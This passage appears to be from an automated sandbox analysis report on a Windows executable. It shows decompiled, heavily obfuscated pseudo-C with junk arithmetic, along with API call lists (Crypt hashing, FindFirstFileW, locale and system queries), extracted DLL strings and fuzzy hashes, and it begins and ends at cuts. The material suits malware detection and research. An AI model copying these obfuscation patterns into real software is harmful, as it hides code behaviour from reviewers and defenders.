                                                						_t197 =  *0x4fef48; // 0xc3c34ef0
                                                						_t402 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4fef4c = E004F5954(_v36, _t396, _t402, _v36, __eflags);
                                                						_t428 = _t197;
                                                						 *[fs:eax] = _t428;
                                                						_push(E004F6591);
                                                						_v68 = _v20;
                                                						__eflags = _v68;
                                                						if(_v68 != 0) {
                                                							_t220 = _v68 - 4;
                                                							__eflags = _t220;
                                                							_v68 =  *_t220;
                                                						}
                                                						__eflags = _v68 - 0x35;
                                                						if(_v68 == 0x35) {
                                                							_t213 =  *0x4feea0; // 0xa1d900
                                                							 *0x4feea0 = E0040489C(_t213);
                                                							_t215 =  *0x4feee8; // 0xdcd0f434
                                                							 *0x4feedc = _t215 + 0x77;
                                                							_t217 =  *0x4feefc; // 0x4b08dcc7
                                                							_t218 = _t217 + 4;
                                                							__eflags = _t218;
                                                							 *0x4feef0 = _t218;
                                                						}
                                                						E004FEF10 =  *0x4feef4 * 0xd9;
                                                						 *0x4fef28 = 0x72 - E004FEF2C;
                                                						 *0x4fef04 = E004F356C( &_v36, _t396,  &_v36, 0x4feef4,  &_v36);
                                                						_t208 =  *0x4fef28 * 0xd6;
                                                						__eflags = _t208;
                                                						 *0x4fef3c = _t208;
                                                						E00406CF4( &_v32, _v20);
                                                						return CryptReleaseContext(_v40, 0);
                                                					} else {
                                                						_t237 =  *0x4fef04; // 0x43c14963
                                                						E004FEF20 = _t237 + 0x92;
                                                						if(_v36 - _v36 == _v36) {
                                                							_t392 = E004FEF38; // 0xc3c34fdc
                                                							_t460 = _t392 -  *0x4feefc - E004FEF38; // 0xc3c34fdc
                                                							if(_t460 < 0) {
                                                								_t394 =  *0x4fef18; // 0xbc3e19a
                                                								 *0x4fef4c = _t394 - 0xf5;
                                                							}
                                                						}
                                                						_t241 =  *0x4fef14; // 0xb52124ca
                                                						 *0x4feedc = _t241;
                                                						_t242 =  *0x4feefc; // 0x4b08dcc7
                                                						 *0x4feee0 = _t242;
                                                						_t243 =  *0x4feedc; // 0xbc3e19a
                                                						_t462 = _t243 -  *0x4feee0; // 0x747938b
                                                						if(_t462 > 0) {
                                                							_t390 =  *0x4feef4; // 0xb52124ca
                                                							_t391 = _t390 + 4;
                                                							_t463 = _t391;
                                                							 *0x4feefc = _t391;
                                                						}
                                                						_push(_v36);
                                                						_t407 =  *0x4feefc; // 0x4b08dcc7
                                                						_t245 =  *0x4feef0; // 0x44632301
                                                						E004EE798(_t245, _t396, _t407, _v36, _t463);
                                                						_t247 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4fef18 = E0040489C(_t247);
                                                						_push(_t453);
                                                						_push(0x4f632a);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t455;
                                                						_v56 = _v8;
                                                						if(_v56 != 0) {
                                                							_v56 =  *((intOrPtr*)(_v56 - 4));
                                                						}
                                                						_t254 =  *0x505978(_v44, _v8, _v56, 0);
                                                						_t466 = _t254;
                                                						if(_t254 != 0) {
                                                							_t290 = E004FEF10; // 0x1cb931c0
                                                							_push(_t290);
                                                							_t291 =  *0x4feea0; // 0xa1d900
                                                							_push(_t291);
                                                							_push(_v36);
                                                							_t413 = E004FEF34; // 0xc3c34ef0
                                                							_t439 = E004FEF20; // 0x6e687a1a
                                                							_t293 =  *0x4feedc; // 0xbc3e19a
                                                							E004F5954(_t293, _t396, _t413, _t439, _t466);
                                                							_v36 = 0;
                                                							while(_v36 < 6) {
                                                								_v36 = _v36 + 1;
                                                								_t382 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4fef14 = _t382;
                                                								_t383 =  *0x4feee0; // 0x747938b
                                                								E004FEF2C = _t383 + 4;
                                                								_t385 = E004FEF10; // 0x1cb931c0
                                                								 *0x4fef3c = _t385 -  *0x4fef18;
                                                							}
                                                							_t296 = E004FEF0C; // 0xb52124bf
                                                							E004FEF50 = _t296;
                                                							_t297 =  *0x4fef3c; // 0x1cb932a9
                                                							_v72 = _t297 + 0x78;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feed8 = E004048CC();
                                                							_t300 =  *0x4fef4c; // 0x43c1493c
                                                							 *0x4feef0 = _t300 + 0x77;
                                                							_push(0);
                                                							_push( &_v48);
                                                							_push(0);
                                                							_push(2);
                                                							_push(_v44);
                                                							if( *0x50597c() != 0) {
                                                								_push(_v48);
                                                								E00408478();
                                                								_v36 = 0;
                                                								do {
                                                									_t319 =  *0x4fef40; // 0x3c79b5d4
                                                									 *0x4feea0 = _t319;
                                                									_t320 =  *0x4fef14; // 0xb52124ca
                                                									E004FEED0 = _t320;
                                                									 *0x4feee8 =  *0x4fef40 * 0x6d;
                                                									 *0x4feefc = E004FEF50 * 0x6b;
                                                									 *0x4fef14 =  *0x4feed8 * 0x6a;
                                                									_v36 = _v36 + 1;
                                                								} while (_v36 != 6);
                                                								E004FEF38 = 0x9a - E004FEF38;
                                                								_t326 =  *0x4fef40; // 0x3c79b5d4
                                                								if(_t326 - E004FEF38 < 0x3b) {
                                                									_t375 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEF50 = E0040489C(_t375);
                                                									_t377 = E004FEED0; // 0xc3c34ef0
                                                									_t473 = _t377 - E004FEF50; // 0xa3b3f6c0
                                                									if(_t473 <= 0) {
                                                										_t378 =  *0x4fef40; // 0x3c79b5d4
                                                										_t379 = _t378 *  *0x4fef4c;
                                                										__eflags = _t379;
                                                										E004FEF10 = _t379;
                                                									} else {
                                                										_t380 = E004FEF00; // 0xa3b3f6c0
                                                										 *0x4feee8 = _t380 + 0x2f;
                                                									}
                                                								}
                                                								_t328 = E004FEF50; // 0xa3b3f6c0
                                                								 *0x4fef40 = _t328 - 0x29;
                                                								if(_v36 - _v36 <= _v36 - _v36) {
                                                									_t332 =  *0x4feed8; // 0x1cb9338e
                                                									 *0x4feee0 = _t332;
                                                								} else {
                                                									_t374 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feecc = _t374;
                                                								}
                                                								_push(0);
                                                								_push( &_v48);
                                                								_push(_v52);
                                                								_push(2);
                                                								_push(_v44);
                                                								if( *0x50597c() != 0) {
                                                									_v36 = 0;
                                                									do {
                                                										_t358 = E004FEF10; // 0x1cb931c0
                                                										 *0x4feecc = _t358;
                                                										_v36 = _v36 + 1;
                                                									} while (_v36 != 4);
                                                									 *0x4feecc = E004F5038( &_v36,  &E004FEF2C,  &_v36,  &E004FEF0C,  &E004FEF34);
                                                									_t361 =  *0x4fef3c; // 0x1cb932a9
                                                									 *0x4feefc = _t361 + E004FEED0;
                                                									asm("fild dword [0x4fef4c]");
                                                									E004FEF10 = E004048CC();
                                                									_t364 =  *0x4feeec; // 0xb52124f2
                                                									 *0x4fef28 = _t364 - 0xe3;
                                                									_t366 = E004FEF34; // 0xc3c34ef0
                                                									E004FEF34 = E0040489C(_t366);
                                                									_v60 = _v52;
                                                									if(_v60 != 0) {
                                                										_v60 =  *((intOrPtr*)(_v60 - 4));
                                                									}
                                                									E004F5358(_v52, _t396, _v60 - 1, _t450, _t451);
                                                								}
                                                								_t337 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4feee8 = _t337;
                                                								 *0x4feefc = 0xf -  *0x4feefc;
                                                								_t340 = E004FEF10; // 0x1cb931c0
                                                								 *0x4fef14 = _t340 + 0xd;
                                                								_t342 =  *0x4feedc; // 0xbc3e19a
                                                								 *0x4fef18 = _t342;
                                                								_t343 =  *0x4fef18; // 0xbc3e19a
                                                								_t481 = _t343 -  *0x4feee8; // 0xdcd0f434
                                                								if(_t481 >= 0) {
                                                									_t344 =  *0x4fef44; // 0x38993
                                                									 *0x4fef18 = _t344 - 0x36;
                                                									__eflags = 0x34;
                                                									 *0x4fef30 = 0x34 -  *0x4feea0;
                                                								} else {
                                                									if(_v36 + _v36 <= _v36) {
                                                										_t354 = E004FEF34; // 0xc3c34ef0
                                                										 *0x4feee8 = _t354;
                                                									} else {
                                                										_t355 =  *0x4fef4c; // 0x43c1493c
                                                										E004FEF50 = _t355 - 8;
                                                									}
                                                								}
                                                								_t348 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef4c = _t348 *  *0x4fef04;
                                                								_t350 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEED0 = _t350 *  *0x4fef3c;
                                                							}
                                                							 *0x4fef28 = E004FEED0 * 0xc4;
                                                							E004FEF20 = E004F356C( &_v36, _t396,  &E004FEF0C,  &_v36,  &_v36);
                                                							_t309 = E004FEF34; // 0xc3c34ef0
                                                							 *0x4fef44 = _t309 + 0xf5;
                                                							_t311 =  *0x4feecc; // 0xd26bafe0
                                                							E004FEF50 = _t311;
                                                							_t312 =  *0x4feefc; // 0x4b08dcc7
                                                							_v72 = _t312 + 4;
                                                							asm("fild dword [ebp-0x44]");
                                                							 *0x4feed8 = E004048D8();
                                                						}
                                                						_t255 =  *0x4fef3c; // 0x1cb932a9
                                                						_v72 = _t255 + 0x21;
                                                						asm("fild dword [ebp-0x44]");
                                                						E004FEF20 = E004048CC();
                                                						_t258 =  *0x4feed8; // 0x1cb9338e
                                                						 *0x4fef30 = _t258 -  *0x4fef18;
                                                						_t260 =  *0x4feeec; // 0xb52124f2
                                                						_t485 = _t260 + E004FEF38 - E004FEF38; // 0xc3c34fdc
                                                						if(_t485 == 0) {
                                                							asm("fild dword [0x4fef38]");
                                                							E004FEF50 = E004048CC();
                                                						}
                                                						E004FEED0 = E004FEED0 - 0x82;
                                                						_t262 = E004FEF00; // 0xa3b3f6c0
                                                						 *0x4feee8 = _t262 - 0x1a;
                                                						 *0x4feecc = E004F356C( &_v36, _t396, 0x4feef0,  &E004FEF2C,  &_v36);
                                                						_pop(_t435);
                                                						 *[fs:eax] = _t435;
                                                						 *0x505980(_v44, E004F6334);
                                                						if(_v36 - _v36 < _v36) {
                                                							_v36 = 0;
                                                							while(_v36 < 0xd) {
                                                								_v36 = _v36 + 1;
                                                								_t288 = E004FEF50; // 0xa3b3f6c0
                                                								 *0x4feecc = _t288;
                                                							}
                                                							_t281 =  *0x4fef4c; // 0x43c1493c
                                                							 *0x4feee8 = _t281;
                                                							_t282 = E004FEED0; // 0xc3c34ef0
                                                							_v72 = _t282 + 0xdb;
                                                							asm("fild dword [ebp-0x44]");
                                                							E004FEF00 = E004048CC();
                                                							E00407678(_v24, 2, 1,  &_v24);
                                                						}
                                                						_t272 =  *0x4fef18; // 0xbc3e19a
                                                						E004FEF2C = _t272;
                                                						asm("fild dword [0x4fef44]");
                                                						E004FEF38 = E004048D8();
                                                						E00407678(_v24, 2, 1,  &_v32);
                                                						E00406CF4( &_v32, L"GetUserDefaultLocaleName");
                                                						_t279 =  *0x4fef14; // 0xb52124ca
                                                						 *0x4feecc = _t279;
                                                						return _t279;
                                                					}
                                                				}
                                                			}



































































































































                                                0x004f5c80
                                                0x004f5c80
                                                0x004f5c80
                                                0x004f5c81
                                                0x004f5c83
                                                0x004f5c86
                                                0x004f5c87
                                                0x004f5c88
                                                0x004f5c8b
                                                0x004f5c8e
                                                0x004f5c91
                                                0x004f5c94
                                                0x004f5c97
                                                0x004f5c9a
                                                0x004f5c9d
                                                0x004f5ca0
                                                0x004f5ca6
                                                0x004f5cad
                                                0x004f5cae
                                                0x004f5cb3
                                                0x004f5cb6
                                                0x004f5cb9
                                                0x004f5cc1
                                                0x004f5cc4
                                                0x004f5ccc
                                                0x004f5cd1
                                                0x004f5cd6
                                                0x004f5cdb
                                                0x004f5ce6
                                                0x004f5ced
                                                0x004f5cee
                                                0x004f5cf3
                                                0x004f5cf6
                                                0x004f5d08
                                                0x004f5d10
                                                0x004f6591
                                                0x004f6596
                                                0x004f659b
                                                0x004f65a6
                                                0x004f65ab
                                                0x004f65b3
                                                0x004f65b8
                                                0x004f65c0
                                                0x004f65cd
                                                0x004f65d4
                                                0x004f65d7
                                                0x004f6642
                                                0x004f6644
                                                0x004f6647
                                                0x004f664a
                                                0x004f6652
                                                0x004f6658
                                                0x004f6665
                                                0x004f6672
                                                0x004f5d16
                                                0x004f5d20
                                                0x004f5d25
                                                0x004f5d2d
                                                0x004f5d32
                                                0x004f5d3c
                                                0x004f5d41
                                                0x004f5d4b
                                                0x004f5d57
                                                0x004f5d67
                                                0x004f5d6a
                                                0x004f5d75
                                                0x004f5d82
                                                0x004f5d87
                                                0x004f5d8c
                                                0x004f5d9c
                                                0x004f5da1
                                                0x004f5da9
                                                0x004f5dbf
                                                0x004f5dc7
                                                0x004f63cf
                                                0x004f63d4
                                                0x004f63d9
                                                0x004f63de
                                                0x004f63e4
                                                0x004f63e9
                                                0x004f63f3
                                                0x004f63f8
                                                0x004f63f8
                                                0x004f6402
                                                0x004f6407
                                                0x004f640c
                                                0x004f6411
                                                0x004f641c
                                                0x004f641c
                                                0x004f6421
                                                0x004f642c
                                                0x004f6431
                                                0x004f6436
                                                0x004f6439
                                                0x004f643d
                                                0x004f6442
                                                0x004f6442
                                                0x004f6447
                                                0x004f6447
                                                0x004f644a
                                                0x004f644e
                                                0x004f648b
                                                0x004f6490
                                                0x004f6490
                                                0x004f6493
                                                0x004f6496
                                                0x004f649e
                                                0x004f6450
                                                0x004f6450
                                                0x004f6455
                                                0x004f645a
                                                0x004f645f
                                                0x004f6465
                                                0x004f6484
                                                0x004f6467
                                                0x004f6467
                                                0x004f646f
                                                0x004f646f
                                                0x004f6465
                                                0x004f64a3
                                                0x004f64a8
                                                0x004f64ad
                                                0x004f64b2
                                                0x004f64b3
                                                0x004f64b8
                                                0x004f64b9
                                                0x004f64bf
                                                0x004f64d0
                                                0x004f64d7
                                                0x004f64da
                                                0x004f64dd
                                                0x004f64e5
                                                0x004f64e8
                                                0x004f64ec
                                                0x004f64f1
                                                0x004f64f1
                                                0x004f64f6
                                                0x004f64f6
                                                0x004f64f9
                                                0x004f64fd
                                                0x004f64ff
                                                0x004f6509
                                                0x004f650e
                                                0x004f6516
                                                0x004f651b
                                                0x004f6520
                                                0x004f6520
                                                0x004f6523
                                                0x004f6523
                                                0x004f6532
                                                0x004f6542
                                                0x004f655b
                                                0x004f6560
                                                0x004f6560
                                                0x004f656a
                                                0x004f6575
                                                0x004f6586
                                                0x004f5dcd
                                                0x004f5dcd
                                                0x004f5dd7
                                                0x004f5de5
                                                0x004f5de7
                                                0x004f5df2
                                                0x004f5df8
                                                0x004f5dfa
                                                0x004f5e04
                                                0x004f5e04
                                                0x004f5df8
                                                0x004f5e09
                                                0x004f5e0e
                                                0x004f5e13
                                                0x004f5e18
                                                0x004f5e1d
                                                0x004f5e22
                                                0x004f5e28
                                                0x004f5e2a
                                                0x004f5e2f
                                                0x004f5e2f
                                                0x004f5e32
                                                0x004f5e32
                                                0x004f5e3a
                                                0x004f5e3b
                                                0x004f5e44
                                                0x004f5e49
                                                0x004f5e4e
                                                0x004f5e58
                                                0x004f5e5f
                                                0x004f5e60
                                                0x004f5e65
                                                0x004f5e68
                                                0x004f5e6e
                                                0x004f5e75
                                                0x004f5e7f
                                                0x004f5e7f
                                                0x004f5e90
                                                0x004f5e96
                                                0x004f5e98
                                                0x004f5e9e
                                                0x004f5ea3
                                                0x004f5ea4
                                                0x004f5ea9
                                                0x004f5ead
                                                0x004f5eae
                                                0x004f5eb4
                                                0x004f5eba
                                                0x004f5ebf
                                                0x004f5ec6
                                                0x004f5ecd
                                                0x004f5ecf
                                                0x004f5ed2
                                                0x004f5ed7
                                                0x004f5edc
                                                0x004f5ee4
                                                0x004f5ee9
                                                0x004f5ef4
                                                0x004f5ef9
                                                0x004f5eff
                                                0x004f5f04
                                                0x004f5f09
                                                0x004f5f11
                                                0x004f5f14
                                                0x004f5f1c
                                                0x004f5f21
                                                0x004f5f29
                                                0x004f5f2e
                                                0x004f5f33
                                                0x004f5f34
                                                0x004f5f36
                                                0x004f5f3b
                                                0x004f5f44
                                                0x004f5f4d
                                                0x004f5f5c
                                                0x004f5f66
                                                0x004f5f69
                                                0x004f5f69
                                                0x004f5f6e
                                                0x004f5f73
                                                0x004f5f78
                                                0x004f5f84
                                                0x004f5f90
                                                0x004f5f9c
                                                0x004f5fa1
                                                0x004f5fa4
                                                0x004f5fb5
                                                0x004f5fba
                                                0x004f5fc8
                                                0x004f5fca
                                                0x004f5fd4
                                                0x004f5fd9
                                                0x004f5fde
                                                0x004f5fe4
                                                0x004f5ff5
                                                0x004f5ffa
                                                0x004f5ffa
                                                0x004f6000
                                                0x004f5fe6
                                                0x004f5fe6
                                                0x004f5fee
                                                0x004f5fee
                                                0x004f5fe4
                                                0x004f6005
                                                0x004f600d
                                                0x004f6020
                                                0x004f602e
                                                0x004f6033
                                                0x004f6022
                                                0x004f6022
                                                0x004f6027
                                                0x004f6027
                                                0x004f6038
                                                0x004f603d
                                                0x004f6041
                                                0x004f6042
                                                0x004f6047
                                                0x004f6050
                                                0x004f6058
                                                0x004f605b
                                                0x004f605b
                                                0x004f6060
                                                0x004f6065
                                                0x004f6068
                                                0x004f6088
                                                0x004f608d
                                                0x004f6098
                                                0x004f609d
                                                0x004f60a8
                                                0x004f60ad
                                                0x004f60b7
                                                0x004f60bc
                                                0x004f60c6
                                                0x004f60ce
                                                0x004f60d5
                                                0x004f60df
                                                0x004f60df
                                                0x004f60ec
                                                0x004f60ec
                                                0x004f60f1
                                                0x004f60f6
                                                0x004f6106
                                                0x004f610b
                                                0x004f6113
                                                0x004f6118
                                                0x004f611d
                                                0x004f6122
                                                0x004f6127
                                                0x004f612d
                                                0x004f6155
                                                0x004f615d
                                                0x004f6167
                                                0x004f616d
                                                0x004f612f
                                                0x004f6138
                                                0x004f6149
                                                0x004f614e
                                                0x004f613a
                                                0x004f613a
                                                0x004f6142
                                                0x004f6142
                                                0x004f6138
                                                0x004f6172
                                                0x004f617d
                                                0x004f6182
                                                0x004f618d
                                                0x004f618d
                                                0x004f619c
                                                0x004f61b5
                                                0x004f61ba
                                                0x004f61c4
                                                0x004f61c9
                                                0x004f61ce
                                                0x004f61d3
                                                0x004f61db
                                                0x004f61de
                                                0x004f61e6
                                                0x004f61e6
                                                0x004f61eb
                                                0x004f61f3
                                                0x004f61f6
                                                0x004f61fe
                                                0x004f6203
                                                0x004f620e
                                                0x004f6213
                                                0x004f621e
                                                0x004f6224
                                                0x004f6226
                                                0x004f6231
                                                0x004f6231
                                                0x004f6236
                                                0x004f6240
                                                0x004f6248
                                                0x004f6263
                                                0x004f626a
                                                0x004f626d
                                                0x004f6279
                                                0x004f6288
                                                0x004f628c
                                                0x004f6293
                                                0x004f6295
                                                0x004f6298
                                                0x004f629d
                                                0x004f62a2
                                                0x004f62a8
                                                0x004f62ad
                                                0x004f62b2
                                                0x004f62bc
                                                0x004f62bf
                                                0x004f62c7
                                                0x004f62dd
                                                0x004f62dd
                                                0x004f62e2
                                                0x004f62e7
                                                0x004f62ec
                                                0x004f62f7
                                                0x004f630d
                                                0x004f631a
                                                0x004f631f
                                                0x004f6324
                                                0x004f6329
                                                0x004f6329
                                                0x004f5dc7

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000254,00000000,00000000,00000001,F0000000,00000000,004F65DC,?,00000000,004F6673), ref: 004F5D08
                                                • CryptCreateHash.ADVAPI32(00000254,00008003,00000000,00000000,0000FDE8,00000000,004F6587,?,?,00000000,004F6673), ref: 004F5DBF
                                                • CryptHashData.ADVAPI32(0000FDE8,?,00000000,00000000,00000000,004F632A,?,00000003,?,?,00000000,004F6673), ref: 004F5E90
                                                • CryptGetHashParam.ADVAPI32(0000FDE8,00000002,00000000,00000000,00000000,00000003,00A1D900,1CB931C0,?,00000003,?,?,00000000,004F6673), ref: 004F5F3C
                                                • CryptGetHashParam.ADVAPI32(0000FDE8,00000002,004F81D9,00000000,00000000), ref: 004F6048
                                                • CryptDestroyHash.ADVAPI32(0000FDE8,004F6334,?,?,00000000,004F6673), ref: 004F6279
                                                • CryptReleaseContext.ADVAPI32(00000254,00000000,00000003,004F6591,?,?,00000000,004F6673), ref: 004F6580
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                • String ID: 5$GetUserDefaultLocaleName$Microsoft.WSMan.Management.dll$`\O$iaspolcy.dll$secur32.dll
                                                • API String ID: 3606780921-435246613
                                                • Opcode ID: 2fd2ff0fd80f40575e78e724da7c3bd145e78b2448da6deb347058f8535cc683
                                                • Instruction ID: 2eed9b999cd030ee7ca33e1ec6f51900c00e0050041dac07e2deacad0d7d184d
                                                • Opcode Fuzzy Hash: 2fd2ff0fd80f40575e78e724da7c3bd145e78b2448da6deb347058f8535cc683
                                                • Instruction Fuzzy Hash: 0E42E5B1910249EFDB00DF6AED85AA977F5FB08306B11443AE505E72B0D779A920CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: f1b40f030405639694847ba2eff25265c7c57a9340bd237086a5ca62e2820a50
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: E23199B2900209CFDB10CF88C884AAEBBF9FF48364F24804AD805A7311C774EA44CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E004096A0(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                				char _v8;
                                                				short _v12;
                                                				void* _v16;
                                                				char _v20;
                                                				char _v24;
                                                				void* _t29;
                                                				void* _t40;
                                                				intOrPtr* _t44;
                                                				intOrPtr _t55;
                                                				void* _t61;
                                                
                                                				_push(__ebx);
                                                				_v24 = 0;
                                                				_v20 = 0;
                                                				_t44 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t61);
                                                				_push(0x409760);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t61 + 0xffffffec;
                                                				_t21 =  &_v16;
                                                				L004027F4();
                                                				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                				E004073C4( &_v20, 4,  &_v16);
                                                				E00407508(_t44, _v20, _v8);
                                                				_t29 = E00409568( *_t44, _t44); // executed
                                                				if(_t29 == 0) {
                                                					_v12 = 0;
                                                					E004073C4( &_v24, 4,  &_v16);
                                                					E00407508(_t44, _v24, _v8);
                                                					_t40 = E00409568( *_t44, _t44); // executed
                                                					if(_t40 == 0) {
                                                						E004069A8(_t44);
                                                					}
                                                				}
                                                				_pop(_t55);
                                                				 *[fs:eax] = _t55;
                                                				_push(E00409767);
                                                				E00406A08( &_v24, 2);
                                                				return E004069A8( &_v8);
                                                			}













                                                0x004096a6
                                                0x004096a9
                                                0x004096ac
                                                0x004096af
                                                0x004096b1
                                                0x004096b7
                                                0x004096be
                                                0x004096bf
                                                0x004096c4
                                                0x004096c7
                                                0x004096cc
                                                0x004096d2
                                                0x004096db
                                                0x004096eb
                                                0x004096f8
                                                0x004096ff
                                                0x00409706
                                                0x00409708
                                                0x00409719
                                                0x00409726
                                                0x0040972d
                                                0x00409734
                                                0x00409738
                                                0x00409738
                                                0x00409734
                                                0x0040973f
                                                0x00409742
                                                0x00409745
                                                0x00409752
                                                0x0040975f

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,00409760,?,?), ref: 004096D2
                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,00409760,?,?), ref: 004096DB
                                                  • Part of subcall function 00409568: FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 0040959B
                                                  • Part of subcall function 00409568: FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 004095AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                • String ID:
                                                • API String ID: 3216391948-0
                                                • Opcode ID: 6e9cf3b61bff4bb8714ab79a9cff7ac151e9b096445f59aac33c83bfb5e7eaf7
                                                • Instruction ID: aa89d469336c03913e643f7b0c1df1e1c5c07df69510ff936d866d4eb2d40408
                                                • Opcode Fuzzy Hash: 6e9cf3b61bff4bb8714ab79a9cff7ac151e9b096445f59aac33c83bfb5e7eaf7
                                                • Instruction Fuzzy Hash: B3116374A042099BDF04EFA5C992AADB7B8EF45304F50447EB905B32C2D7786E04C769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 46%
                                                			E00409568(char __eax, signed int __ebx) {
                                                				char _v8;
                                                				struct _WIN32_FIND_DATAW _v600;
                                                				void* _t15;
                                                				intOrPtr _t24;
                                                				void* _t27;
                                                
                                                				_push(__ebx);
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t27);
                                                				_push(0x4095c6);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t27 + 0xfffffdac;
                                                				_t15 = FindFirstFileW(E00407330(_v8),  &_v600); // executed
                                                				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                					FindClose(_t15);
                                                				}
                                                				_pop(_t24);
                                                				 *[fs:eax] = _t24;
                                                				_push(E004095CD);
                                                				return E004069A8( &_v8);
                                                			}








                                                0x00409571
                                                0x00409572
                                                0x00409578
                                                0x0040957f
                                                0x00409580
                                                0x00409585
                                                0x00409588
                                                0x0040959b
                                                0x004095a8
                                                0x004095ab
                                                0x004095ab
                                                0x004095b2
                                                0x004095b5
                                                0x004095b8
                                                0x004095c5

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 0040959B
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 004095AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 9b9a563b2912b8edfb64839b49a3138ec06d3323f4039cba26850e23ecb68daa
                                                • Instruction ID: 8b1d0ab5114d407a2e7d7eccee2b89d38bf928b1e631b0751515de59265f2086
                                                • Opcode Fuzzy Hash: 9b9a563b2912b8edfb64839b49a3138ec06d3323f4039cba26850e23ecb68daa
                                                • Instruction Fuzzy Hash: 78F0B471910204AEC721EB76CD1299EB3ECDB043107510477B804F31C1E6385F109518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040AFF4() {
                                                				intOrPtr _v16;
                                                				struct _SYSTEM_INFO* _t3;
                                                
                                                				GetSystemInfo(_t3); // executed
                                                				return _v16;
                                                			}





                                                0x0040aff8
                                                0x0040b004

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: c213adc8cdc8acd44d56294f2ccb6c512b159a8a22956be17e87cebbbdc84e19
                                                • Instruction ID: 3e7e4f89213da729ec0ca4ef67787ec0f81eedc0c9ce544f57ee4d1411337cff
                                                • Opcode Fuzzy Hash: c213adc8cdc8acd44d56294f2ccb6c512b159a8a22956be17e87cebbbdc84e19
                                                • Instruction Fuzzy Hash: 52A012148084000AC404B72A4D4B40B31801940614FC40725749CA52C2E619866402DF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E004F84E8(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				long _v64;
                                                				void* _v68;
                                                				void* _v72;
                                                				signed int _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v92;
                                                				char _v96;
                                                				char _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v108;
                                                				char _v704;
                                                				intOrPtr _v708;
                                                				char _v712;
                                                				char _v716;
                                                				char _v720;
                                                				char _v724;
                                                				char _v740;
                                                				char _v744;
                                                				char _v748;
                                                				char _v752;
                                                				char _v756;
                                                				char _v760;
                                                				signed int _t501;
                                                				signed int _t502;
                                                				signed int _t509;
                                                				signed int _t518;
                                                				signed int _t519;
